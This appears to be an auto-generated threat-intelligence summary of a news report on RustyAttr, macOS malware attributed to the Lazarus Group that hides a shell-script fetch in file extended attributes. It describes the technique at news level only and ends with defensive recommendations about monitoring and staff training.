New RustyAttr Malware Targets macOS Through Extended Attribute Abuse

New RustyAttr Malware Targets macOS Through Extended Attribute Abuse

November 14, 2024 at 04:57AM

A new malware, RustyAttr, has been linked to the North Korean Lazarus Group, utilizing macOS file extended attributes to execute attacks. Disguised as legitimate applications, it uses distractions like error messages and fake PDFs. Protection remains effective on macOS systems, but social engineering may still be needed to bypass safeguards.

### Meeting Takeaways – November 14, 2024

#### Topic: Cryptojacking / Threat Intelligence

1. **New Malware Discovery**: A new malware named **RustyAttr** has been identified, exploiting extended attributes in macOS files.

2. **Attribution to Lazarus Group**: The activity has been moderately attributed to the **Lazarus Group**, linked to North Korea, based on previous campaign overlaps, particularly with **RustBucket**.

3. **Understanding Extended Attributes**:
– These are metadata associated with files, extractable using the `xattr` command.
– They can hold more data than standard file attributes (e.g., size, timestamps).

4. **Malicious Applications**:
– The discovered applications utilize **Tauri**, a cross-platform framework, and are signed with a **revoked certificate**.
– They include an extended attribute designed to fetch and execute a shell script.

5. **Execution Mechanism**:
– Running the shell script activates a distraction mechanism, displaying either:
– An error message (“This app does not support this version”)
– A benign-looking PDF concerning gaming projects.

6. **Web-based Component**:
– The Tauri application attempts to display an HTML webpage using **WebView**.
– This page is engineered to load malicious JavaScript that executes the content from the extended attributes via a Rust backend.
– If no extended attributes are present, a fake web page is displayed.

7. **Unclear Campaign Goals**: The specific objectives of this campaign remain unknown, with no confirmed victims or further payloads observed.

8. **User Interaction Required**:
– Detection notes that users need to turn off **Gatekeeper** (macOS malware protection) for the attack to occur, indicating that social engineering may play a role in victimization.

9. **Ongoing Threats**: North Korean actors continue to engage in broadened campaigns targeting remote job positions and tricking employees from cryptocurrency firms into downloading malware under false pretenses.

### Next Steps
– Continuous monitoring and updates on threat intelligence related to this malware are essential.
– Consider enhanced security training for employees regarding potential social engineering tactics related to remote job recruitment and malware risks.

Full Article